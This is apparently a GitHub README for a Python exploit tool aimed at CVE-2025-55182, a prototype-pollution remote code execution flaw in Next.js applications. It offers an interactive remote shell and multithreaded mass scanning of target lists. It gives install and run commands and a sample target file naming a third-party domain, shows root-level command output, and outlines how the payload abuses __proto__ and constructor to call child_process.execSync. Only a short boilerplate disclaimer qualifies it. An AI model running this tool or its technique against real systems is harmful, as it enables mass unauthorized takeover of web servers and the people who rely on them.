Jenderal92/CVE-2025-55182-React2shell

# CVE-2025-55182 - React2shell A Python 2.7 exploit for **CVE-2025-55182** – a critical prototype pollution / RCE vulnerability in Next.js applications. This tool allows both **single‑target interactive shell** and **mass scanning** of multiple hosts with multithreading, colorful output, and automatic HTTPS fallback. ## 🚀 Features - ✅ **Interactive Shell** for single targets – execute arbitrary system commands - ✅ **Mass Scan** from a file list – multithreaded, fast, results saved automatically - ✅ **Auto‑detection** – single URL → shell mode, existing file → mass scan mode - ✅ **Automatic HTTPS** – adds `https://` if no protocol is given - ✅ **Thread‑safe file writing** – saves vulnerable results in real‑time - ✅ **Custom commands** – change default `id` to any command (`whoami`, `ls`, etc.) - ✅ **No external dependencies** – only `requests` (easily installable) ## 📋 Requirements - **Python 2.7** (the tool is specifically written for Python 2.7) - `requests` library – install with: pip install requests · A terminal that supports ANSI colors (most Linux/macOS terminals, Windows Terminal, PowerShell) 📦 Installation git clone https://github.com/Jenderal92/cve-2025-55182.git cd CVE-2025-55182 pip install requests Make the script executable (optional): chmod +x CVE-2025-55182.py 🎯 Usage 1. Interactive Shell (Single Target) python2 CVE-2025-55182.py https://target.com or without protocol (HTTPS is added automatically): python2 CVE-2025-55182.py target.com Once connected and verified vulnerable, you get a shell prompt: $ id uid=0(root) gid=0(root) groups=0(root) $ whoami root $ ls -la ... Built‑in commands: · exit / quit – close shell · clear – clear screen · help – show help 2. Mass Scan (List of Targets) Prepare a file with one target per line (with or without http/https): targets.txt app-site3.htface.tech https://example.com http://127.0.0.1:3000 vulnerable-site.org python2 CVE-2025-55182.py targets.txt python2 CVE-2025-55182.py targets.txt 20 "whoami" results.txt Mass scan output example: [INFO] Loaded 4 URLs [INFO] Threads: 10, Command: 'id', Output: res.txt [*] (1/4) Checking: https://site.com [+] VULNERABLE: https://site.com Status: 303 Output: uid=0(root) gid=0(root) groups=0(root) [-] NOT VULNERABLE: https://example.com ... Saved results (res.txt): domain : https://site.com cmd : uid=0(root) gid=0(root) groups=0(root) -------------------------------------------------- 🧪 How It Works The exploit sends a crafted multipart/form-data request to a Next.js endpoint (/login is appended if the path is empty). It abuses prototype pollution (__proto__:then and constructor:constructor) to inject a malicious prefix that executes a system command using child_process.execSync(). The server responds with a 303 redirect containing the command output in the x-action-redirect header (or Location). The tool extracts the result from /login?a=

. 🛡️ Disclaimer This tool is intended for educational purposes and authorized security testing only. Unauthorized access to computer systems is illegal. The author assumes no liability for any misuse or damage caused by this software. You must have explicit written permission from the owner of the target system before using this exploit. More Disclaimer You Can see the disclaimer on the cover of Jenderal92. You can check it [HERE !!!](https://github.com/Jenderal92/)